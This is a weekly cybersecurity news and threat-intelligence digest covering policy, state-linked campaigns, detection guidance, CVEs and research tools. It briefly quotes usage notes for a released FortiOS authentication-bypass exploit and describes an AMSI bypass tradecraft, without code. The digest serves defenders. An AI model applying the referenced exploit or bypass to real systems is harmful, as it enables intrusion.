Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week further exploitation of zero-days in edge security appliances… At the end of the month we are planning on releasing guidance (co-sealed with a number of partners) for device manufactures (physical and virtual) on the minimum telemetry and volatile/non volatile forensic requirements in response..
In the high-level this week:
Passkeys: they're not perfect but they're getting better - National Cyber Security Centre publishes - “Passkeys are the future of authentication, offering enhanced security and convenience over passwords, but widespread adoption faces challenges that the NCSC is working to resolve.”
New proposals to counter ransomware: Have your say - National Cyber Security Centre publishes - “Help shape the proposals aimed at striking a significant blow to the ransomware criminal business model in the UK.”
Bolstering the cybersecurity of the healthcare sector - European Union publishes - “The Commission has presented an EU Action Plan to strengthen the cybersecurity of hospitals and healthcare providers. This initiative is a key priority within the first 100 days of the new mandate, aiming to create a safer and more secure environment for patients.”
Fired Disney employee will plead guilty to hacking menus to hide peanut content - CNBC reports - “A former Disney employee agreed to plead guilty in a federal criminal case where he is accused of hacking into menu-creation software for the company’s restaurants, to falsely indicate that certain food items did not contain potentially deadly allergens such as peanuts”
Cybersecurity: Cybersecurity and Cyber Solidarity Act published in Official Journal - Practical Law publishes - “On 15 January 2025, Regulation (EU) 2025/37 of the European Parliament and of the Council of 19 December 2024 amending Regulation (EU) 2019/881 (Cybersecurity Act) as regards managed security services and Regulation (EU) 2025/38 of the European Parliament and of the Council of 19 December 2024 laying down measures to strengthen solidarity and capacities in the Union to detect, prepare for and respond to cyber threats and incidents and amending Regulation (EU) 2021/694 (Cyber Solidarity Act) were published in the Official Journal of the European Union.”
Hackney Council still addressing 2020 data breach issues - BBC reports- “Hackney Council has bought a new housing management system - technology that supports local authorities manage housing - as it tries to address the damage from a cyber attack four years ago.”
Towards a Digital Clearinghouse 2.0 - European Data Protection Supervisor publishes - “To help promote effective enforcement in the digital world, the EDPS publishes a concept note on the future of cross-regulatory cooperation. Building on its experience with the Digital Clearinghouse (2017-2021), this publication take stock of relevant developments in the EU regulatory sphere, such as the EU Digital Rulebook and landmark rulings of the EU Court of Justice, as well as new multilateral cooperation structures at national level. Relevant stakeholders will be also involved in the discussion.”
'Tour Guides' Arrested in Bangkok's Sophisticated SMS Scam - Khaosod English reports - “ The Cyber Police Task Force has apprehended two Chinese nationals who masqueraded as tour guides while operating a sophisticated mobile scam operation targeting thousands of shoppers across Bangkok’s busiest commercial areas....” … “The operation utilized false base station technology to transmit fraudulent SMS messages containing phishing links to nearby mobile devices....”
Cybersecurity Performance Goals Adoption Report - CISA publishes - “Exploitable services routinely monitored by CISA Vulnerability Scanning have been steadily decreasing from 12 services per enrollee in August 2022 to about eight services per enrollee in August 2024”
Product Security Bad Practices - CISA updates - “Three new bad practices on use of known insecure or outdated cryptographic functions, hardcoded credentials, and product support periods.”
Reporting on/from China
Biden administration looks to penalize Salt Typhoon telecom hackers - Washington Post reports - “The administration could decide as early as Monday to designate the firm, whose name has not been released publicly, said the officials. The decision is not yet final, they cautioned.”Treasury Sanctions Company Associated with Salt Typhoon and Hacker Associated with Treasury Compromise
Treasury Sanctions Company Associated with Salt Typhoon and Hacker Associated with Treasury Compromise - US Department of Treasury announces
Overview of the Global Defense Cyberspace Situation in 2024 - Qian Internet Intelligence Bureau analyses - “The United States, the United Kingdom, Canada, Australia, Japan, South Korea and other countries, as well as the European Union, have issued cybersecurity strategies, decrees and administrative orders to improve the network security policy and regulatory system, set a proactive defense tone, strengthen work guidance and overall coordination, and emphasize the fight against cyber security”
Shanghai and Beijing unveil plans to boost brain computer interface industry - South China Morning Post reports - “Shanghai is seeking to achieve self-sufficiency in the core sectors of the industry chain and position itself as a “global innovation hub for BCI [brain computer interface] products” in five years’ time, according to a detailed plan for 2025-30 released by the city government on Friday.”
AI
Spy vs. AI - Anne Neuberger forecasts- “AI’s potential to revolutionize the intelligence community lies in its ability to process and analyze vast amounts of data at unprecedented speeds.”
AI Cybersecurity Collaboration Playbook - CISA publishes - “Guide JCDC partners on how to voluntarily share information related to cybersecurity incidents and vulnerabilities associated with AI systems.”
Cyber proliferation
Arria-formula Meeting on “Commercial Spyware and the Maintenance of International Peace and Security” - Security Council Report publishes - “This afternoon (14 January), the US will convene an Arria-formula meeting on the implications of the proliferation and misuse of commercial spyware for the maintenance of international peace and security. The meeting is being co-sponsored by Council members France, the Republic of Korea (ROK), and the UK, together with Australia, Austria, Canada, Estonia, Finland, Japan, Latvia, Lithuania, the Netherlands, Norway, Poland, and Sweden. Briefings are expected from John Scott-Railton, senior researcher at the Citizen Lab at the University of Toronto, which investigates digital espionage targeting civil society, among other issues”
Nearly 100 countries have acquired cellphone spyware ‘and they’re using it’: Official - Breaking Defense reports - “Casey’s estimation that nearly 100 countries have purchased some form of cellphone spyware suggests the market has grown a bit since April 2023 when Britain’s National Cyber Security Centre (another NCSC) said more than 80 capitals had acquired the tech.”
Bounty Hunting
Treasury Sanctions Company Associated with Salt Typhoon and Hacker Associated with Treasury Compromise - US Department of Treasury announces - “Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) is sanctioning Yin Kecheng, a Shanghai-based cyber actor who was involved with the recent Department of the Treasury network compromise.”
Operators of Cryptocurrency Mixers Charged with Money Laundering - US Department of Justice announces - “According to the indictment, the defendants operated cryptocurrency ‘mixers’ that served as safe havens for laundering criminally derived funds, including the proceeds of ransomware and wire fraud,”
Security through transparency: RP2350 Hacking Challenge results are in - Raspberry Pi act in an exemplary manner regarding market transparency - “All vendors have security vulnerabilities in their chips. We are unusual because we talk about them, and aim to fix them, rather than brushing them under the carpet. Security through transparency is here to stay.”
DORA implementation brings EU cyber insurance market into focus - Cyber Risk Insurer talks up - “Increased requirements around the management of information and communication technology (ICT) risks under the Digital Operational Resilience Act, which took effect in the EU today, may lead to an increase in cyber insurance take-up for in-scope organisations.”
… given this organisations might want to consider how it forms part of their cyber defence/resilience strategy both in the psychological game as well as the operational...
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Saturday…
Ollie
Cyber threat intelligence
Who is doing what to whom and how allegedly.
Reporting on Russia
New Star Blizzard spear-phishing campaign targets WhatsApp accounts
Microsoft Threat Intelligence detail an alleged Russian campaign which shows some interesting victimology..
In mid-November 2024, Microsoft Threat Intelligence observed the Russian threat actor we track as Star Blizzard sending their typical targets spear-phishing messages, this time offering the supposed opportunity to join a WhatsApp group. This is the first time we have identified a shift in Star Blizzard’s longstanding tactics, techniques, and procedures (TTPs) to leverage a new access vector. Star Blizzard’s targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations researchers whose work touches on Russia, and sources of assistance to Ukraine related to the war with Russia.
Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations
Amaury G., Maxime A., Erwan Chevalier and Felix Aimé outline an alleged Russian campaign which again shows some interesting victimology but also laziness in operational security..
Our investigation led us to find 18 DOCX files with embedded macros, including seven blank documents that are part of the same infection chain. Almost all documents likely originally belong to the Ministry of Foreign Affairs of the Republic of Kazakhstan, either as correspondence letters, draft documents, or internal administrative notes. They are dated from 2021 to October 2024 (based on both internal dates and metadata).
..
Other documents are administrative reports or briefings regarding official meetings between Kazakhstan officials and foreign stakeholders, such as the state visit from Kazakhstan president Tokaiev in Mongolia in October 2024 or his meeting with executives of US companies in New York during the 78th session of the UN General Assembly in September 2024.
..
We assess it is possible that this campaign was conducted by a Russia-nexus intrusion set, UAC-0063, sharing overlaps with APT28.
Justice Department and FBI Conduct International Operation to Delete Malware Used by China-Backed Hackers
US Department of Justice announces a removal operation in which they attribute a previous campaign to China. This was achieved using the sinkhole that Sekoia initially setup showing the value of public/private partnerships i.e. the public bit get legal authorisation to do the invasive operation.
The Justice Department and FBI today announced a multi-month law enforcement operation that, alongside international partners, deleted “PlugX” malware from thousands of infected computers worldwide. As described in court documents unsealed in the Eastern District of Pennsylvania, a group of hackers sponsored by the People’s Republic of China (PRC), known to the private sector as “Mustang Panda” and “Twill Typhoon,” used a version of PlugX malware to infect, control, and steal information from victim computers.
According to court documents, the PRC government paid the Mustang Panda group to, among other computer intrusion services, develop this specific version of PlugX. Since at least 2014, Mustang Panda hackers then infiltrated thousands of computer systems in campaigns targeting U.S. victims, as well as European and Asian governments and businesses, and Chinese dissident groups.
Joint Statement of ROK-US-Japan on North Korean Cryptocurrency Theft and Public-Private Cooperation
The Republic of Korea, the United States, and Japan issue an on alleged North Korean crypto asset campaigns. Highlights the threat to the sector and a reminder on why there should be no complacency.
North Korea-linked Advanced Persistent Threat (APT) groups, including the Lazarus Group, which has been sanctioned by the relevant authorities of the three countries, continue to demonstrate a pattern of malicious behavior in cyberspace by conducting numerous cybercrime activities to steal cryptocurrencies and target exchanges, virtual asset custodians, and individual users. In 2024 alone, the governments of the three countries have individually and jointly attributed multiple cryptocurrency thefts to North Korea: $308 million from DMM Bitcoin, $50 million from Upbit, and $16.13 million from Rain Management (in USD equivalent). In addition, based on detailed industry analysis, South Korea and the United States have additionally attributed $235 million from WazirX and $50 million from Radiant Capital to North Korea in 2024.
Attacks that exploit LinkedIn are mainly used by the attack group Lazarus, and JPCERT/CC has been continuously observing attacks exploiting LinkedIn against domestic organizations since around 2019. Lessons learned from past incidents show that using LinkedIn on a host used for business purposes is extremely dangerous and should be avoided unless there is a special reason. In order to reduce such damage, please consider taking measures such as restricting the use of SNS on business terminals (installation of SNS apps, access control, etc.). If you allow the use of SNS on hosts used for business purposes, we recommend creating rules and considering measures to prevent damage even if an attacker contacts you.
The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
Jérôme Segura does what his does best with this analysis. It highlight that the Ad eco-system is challenging to provide integrity in. Even if you are a big technology firm..
This is the most egregious malvertising operation we have ever tracked, getting to the core of Google’s business and likely affecting thousands of their customers worldwide. We have been reporting new incidents around the clock and yet keep identifying new ones, even at the time of publication.
The following diagram illustrates at a high level the mechanism by which advertisers are getting fleeced:
Figure 1: Process flow for this Google Ads heist campaign
8 Additional Compromised Chrome Extensions Affecting 1.1 Million Users
William Tran details further elements of of this campaign. More interesting to me is it shows how the intelligence picture evolves over time, especially if reporting happens early. Also note the length of time some of the extensions were copromised.
No Spin.AI customers affected by phishing attempt: We reviewed the OAuth ID used in the phishing attempt and found no evidence of our customers falling victim to this phishing attempt.
8 compromised extensions not previously reported: We processed our database using the IOCs and found the sclpfybn[.]com domain in 8 extensions that were not previously reported. These 8 extensions were used by 1.1 million users during the time of compromise.
Signs of this attack campaign starting in 2023: Thanks to our database, which maintains a history of all browser extensions, we found that the earliest the sclpfybn[.]com domain was detected was in September 2023. While many browser extensions were either quickly patched or removed from the Chrome Web Store, some browser extensions were compromised for over 300 days before receiving a patch.
One extension was compromised earlier than initially reported: One extension (AI Shop Buddy/Amazon Search; epikoohpebngmakjinphfiagogjcnddm) was previously reported to be compromised in v2.7.3. Our database indicates the compromise really began in v2.7.0.
Banshee: The Stealer That “Stole Code” From MacOS XProtect
Antonis Terefos shows how some malware writers are inspired by their reverse engineering..
One method of distributing Banshee Stealer involved malicious GitHub repositories, targeting Windows users with Lumma Stealer and macOS users with Banshee Stealer.
Banshee operated as a ‘stealer-as-a-service’, priced at $3,000, and was advertised through Telegram and forums such as XSS and Exploit. On November 23, 2024, the malware’s source code was leaked, leading the author to shut down the operations the following day.
Despite shutting down the operation, threat actors continue to distribute the new version of Banshee via phishing websites.
How we find and understand the latent compromises within our environments.
The Dual-Edged Sword: RMM-Ransomware Conundrum and Enhancing Security Through Threat Hunting
Israeli National Cyber Directorate publishes this guide which should inspire detection engineers. The use of Remote Monitoring and Management tooling by adversaries is pervasive..
The use of RMM tools for cyberattacks represents a specific instance of the "Living Off the Land" (LOTL) approach in cybersecurity. This approach involves leveraging legitimate tools and functionalities already present within the target system to execute malicious operations, often evading detection and bypassing traditional security measures.
..
This article offers an overview of the phenomenon and outlines effective threat-hunting strategies for identifying and addressing such activities within the network.
Mika Ayenson, PhD, Miguel Garzon and Samir Bousseaden show how to industrialize / scale detection engineering with this approach. A 😙🤌 to things which scale..
We used automation for the tedious behind-the-scenes work because ON week is about the more interesting research findings, but we wanted to share some of the challenges and pain points of this kind of technology in case you're interested in building your own detonation framework. If you’re interested in following along in general, we’ll walk through some of the nuances and pain points.
Microsoft Expanded Cloud Logs Implementation Playbook
From our friends at CISA..
This playbook provides a detailed overview of the newly introduced logging capabilities in Microsoft Purview Audit (Standard). These capabilities enable organizations to conduct forensic and compliance investigations by accessing critical events, such as
Mail items accessed,
Mail items sent, and
User searches in SharePoint Online and Exchange Online.
These capabilities also allow organizations to monitor and analyze thousands of user and admin operations performed in dozens of Microsoft services and solutions. In addition, these capabilities include administration/enabling actions and ingestion of these logs to Microsoft Sentinel and Splunk Security Information and Event Management (SIEM) systems.
How to use Temporary Access Pass (TAP) with internal guest users
Dishan Francis show how to leverage this feature to further reduce the authentication attack surface.
A Temporary Access Pass (TAP) is a time-limited passcode that can be configured for single use or multiple sign-ins.
Organisations not only have internal users to manage but also guest users. Until now, the TAP method was only available for internal users, and guest users were not permitted to use this method. This makes sense because if guest users also need to use passwordless authentication, it should occur in their home tenant.
But now Entra ID supports TAP for “Internal Guest” users.
Privacy-Preserving Authentication: Theory vs. Practice
Daniel Slamanig provides an academic review of an interesting area, especially in a world where there is less trust.
It needs to be concluded, that currently enrolled (and partly also planned) identity solutions typically provide rather weak privacy protection and are quite far from what could be considered the ideal case.
Recent progress in cryptographic research and in parricular in the field of zk-SNARKs, however, does now even enable solutions based on existing “legacy cryptography” and so even immediate large-scale deployments do not seem out of reach.
Aymeric Fromherz and Jonathan Protzenko show when constrained C is use then porting to memory safe languages in a semi-automated manner is practical.
We apply our methodology to existing formally verified C codebases: the HACL* cryptographic library, and binary parsers and serializers from EverParse, and show that the subset of C we support is sufficient to translate both applications to safe Rust. Our evaluation shows that for the few places that do violate Rust's aliasing discipline, automated, surgical rewrites suffice; and that the few strategic copies we insert have a negligible performance impact. Of particular note, the application of our approach to HACL* results in a 80,000 line verified cryptographic library, written in pure Rust, that implements all modern algorithms - the first of its kind.
This is from the Gravy Analytics breach hinting at what went down.
On January 4, 2025, Gravy Analytics, a subsidiary of Unacast, Inc, identified unauthorized access to its AWS cloud storage environment. The unauthorized person obtained some files, but the contents of those files and whether they contain personal data remains under investigation. Gravy Analytics is informing Datatilsynet at this time for your awareness, as speculation about this incident has started to appear on social media and in news media.
CVE-2024-8474: OpenVPN Connect Android application exposure of private key in application debug logs
An oof here..
A security vulnerability exists in the OpenVPN Connect Android application prior to version 3.5.0. The application's configuration profile may log the private key in clear text when being debugged with Android Debug Bridge (ADB) tools. An unauthorized actor accessing the device's logs could potentially use this private key to decrypt VPN traffic, posing a security risk.
However, several significant factors limit exploitability and mitigate the vulnerability's real-world impact. Specifically, physical access to the device, use of developer mode and USB debugging, and real-time log access before an attacker can retrieve the private key from the logs.
Under the cloak of UEFI Secure Boot: Introducing CVE-2024-7344
Martin Smolár shows the chain of trust vulnerability attack surface rabbit hole is indeed deep. Interesting so many vendors could have fallen foul..
Exploitation of this vulnerability leads to the execution of untrusted code during system boot, enabling potential attackers to easily deploy malicious UEFI bootkits (such as Bootkitty or BlackLotus) even on systems with UEFI Secure Boot enabled, regardless of the installed operating system.
The affected UEFI application is part of several real-time system recovery software suites developed by Howyar Technologies Inc., Greenware Technologies, Radix Technologies Ltd., SANFONG Inc., Wasay Software Technology Inc., Computer Education System Inc., and Signal Computer GmbH. Following is the list of vulnerable software products:
Howyar SysReturn before version 10.2.023_20240919
Greenware GreenGuard before version 10.2.023-20240927
Radix SmartRecovery before version 11.2.023-20240927
Sanfong EZ-back System before version 10.3.024-20241127
WASAY eRecoveryRX before version 8.4.022-20241127
CES NeoImpact before version 10.1.024-20241127
SignalComputer HDD King before version 10.3.021-20241127
The vulnerability is caused by the use of a custom PE loader instead of using the standard and secure UEFI functions LoadImage and StartImage.
Being a good CLR host – Modernizing offensive .NET tradecraft
Joshua Magri shows where detection engineers might go to find some gold..
Operators can take control over many aspects of the CLR using “CLR customizations” when executing .NET assemblies in memory
Taking over memory management for the CLR enables operators to control and track all allocations made by the CLR, and also provides an easy way to keep track of assemblies being loaded into the process
Implementing a custom assembly loading manager enables a novel AMSI bypass using only “intended” functionality, with no byte patches or process hacking required
CVE-2024-55591: Authentication bypass in Node.js websocket module
Exploited in the wild..
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS and FortiProxy may allow a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Please note that reports show this is being exploited in the wild.
Sina Kheirkhah walks through the vulnerability and then releases an exploit…
Start by running the code in "Normal" mode. If you encounter a password prompt, it indicates the target is functional. Next, switch to "Exploit" mode. If you see the message "Failed to complete authentication," the target might be vulnerable. Note that the exploit code includes hardcoded addresses and offsets, which you'll need to modify to work with your approved target.
Low level tooling and techniques for attack and defence researchers…
Dyana
Simone Margaritelli releases an sandbox which again provides scale to those dealing with various threats..
Dyana is a sandbox environment using Docker and Tracee for loading, running and profiling a wide range of files, including machine learning models, ELF executables, Pickle serialized files, Javascripts and more. It provides detailed insights into GPU memory usage, filesystem interactions, network requests, and security related events.
Tomer Harpaz releases a collaboration work aid for those who don’t use Ghidra (or Binary Ninja)..
LabSync is an IDA plugin that can be used to partially synchronize IDBs between different users working on reversing the same binaries.
LabSync is intended to be non-intrusive, lightweight, and easy to use for very frequent syncs (think as frequently and easily as you saved your IDB before Undo was a thing).
The leading use case is multiple people reversing the same binary at the same time, and especially for binaries that don't start from a good "baseline" IDB (i.e. no typing information, non-standard formats or architectures), and whose structure keeps changing during the reversing process.
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
